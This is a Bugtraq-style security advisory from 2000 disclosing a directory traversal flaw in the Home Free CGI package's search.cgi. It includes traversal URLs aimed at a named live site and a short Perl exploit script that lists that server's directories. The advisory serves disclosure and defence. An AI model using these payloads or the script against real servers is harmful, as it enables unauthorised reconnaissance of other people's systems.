=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Вт, 04 янв 2000  05:52:23

   От: k0ad k1d <k0adk1d@HOTMAIL.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Another search.cgi vulnerability

--------------------------------------------------------------------------------




==============================================================================



    #!/bin/csh security advisory

    ----------------------------



           Title  :  Vulnerabilities in the SolutionScripts.com

                     Home Free CGI package.



    Advisory Ref  :  csh-adv:04.01.2000-CGI-HomeFree-01



         Credits  :  fzx, omnihil, the guys in !el8

                     DSKZ, M0D



==============================================================================



Introduction

------------



SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that

support the language (WinNT, Linux, various Unix flavors). Home Free is a

package developed and marketed by SolutionScripts.com, below is an extract

from their website.





     "Home Free is the ultimate community building program. Allowing you

      to give your visitors a free web site on your server. With complete

      control over every aspect of your free web site program, you can

      grow page views, revenue and brand awareness for your site."



      http://solutionscripts.com/vault/homefree/index.shtml





Home Free is used by many popular websites. It allows users to set up and

maintain their websites through a series of CGI scripts without posing a

threat to system security.





Details

-------



Home Free consists of the following files from an end-user point of view :-



     ./features.cgi

     ./new.cgi

     ./search.cgi

     ./signup.cgi

     ./user_files.cgi

     ./user_formmail.cgi

     ./user_ftp_import.cgi

     ./user_gbook.cgi

     ./user_manage.cgi

     ./user_pref.cgi

     ./user_uploads.cgi

     ./user_wwwboard.cgi





There are also various 'admin' CGI scripts in the package, such as :-



     ./admin.cgi

     ./admin_browse.cgi

     ./admin_cata.cgi

     ./admin_email.cgi

     ./admin_features.cgi

     ./admin_setup.cgi

     ./admin_update.cgi







Vulnerabilities Identified

--------------------------



     ./search.cgi



     The search.cgi script uses the following input variables :-



       letter=any string

       cata=any string

       perpage=any string

       start=any string

       boolean=or/and

       advanced





     This CGI script can be exploited to view directory listings on the host

     server. A vulnerability exists because of insufficient bounds checking

     of the 'letter' variable when it is parsed by the search.cgi script,

     for example :-





http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt



     The above URL will list the \winnt directory of the host. The

search.cgi

     script also seems to read and display the first line of each file

     (network.wri, et al). We have been unable to use the search.cgi script

     or any of the other scripts in the package to view files to date.



     If we had access to the source code of these Perl scripts, I'm sure

that

     many security problems would be identified.



     You can also exploit the vulnerability to view other directory

listings,

     such as the /cgi-bin directory under Apache.





http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-
bin





     We also took the time in writing a short Perl script to display the

     directory listings of vulnerable servers :



     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip



     #!/usr/bin/perl

     #

     # Quick exploit of the Home Free ./search.cgi script, allows you to

list

     # directories on the host.

     #

     # Default server is antionline's, change as appropriate.

     #



     use IO::Socket;



     if ($ARGV[0] eq "") { die "no argument\n"; }



     $asoc = IO::Socket::INET->new(Proto     => "tcp",

                                   PeerAddr  => "members.antionline.com",

                                   PeerPort  => 80) ||

                     die "can't connect to host: $!";



     select($asoc);

     $| = 1;



     print $asoc "GET

/cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all

HTTP/1.0\n\n";



     while(<$asoc>) {

             if ($_ =~ /.+HREF.+TD.+/) {

                     @parts = split("\"", $_);

                     $foo = $parts[1];

                     @parts = split("/", $foo);

                     print STDOUT $parts[3];

                     print STDOUT "\n";

             }

     }

     close(ASOC);



     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip







  Other smaller problems were identified when testing the bounds checking

and

  flexibility of the other scripts, such as user_manage.cgi. Without access

to

  the source code of the Perl scripts in question, it is very difficult to

  know the security implications of such problems. We'll leave that up to

  the vendor to look into and patch.





==============================================================================



    #!/bin/csh security advisory

    ----------------------------



           Title  :  Vulnerabilities in the SolutionScripts.com

                     Home Free CGI package.



    Advisory Ref  :  csh-adv:01.04.2000-CGI-HomeFree-01



         Credits  :  fzx, omnihil, the guys in !el8

                     DSKZ, M0D



==============================================================================



______________________________________________________

Get Your Private, Free Email at http://www.hotmail.com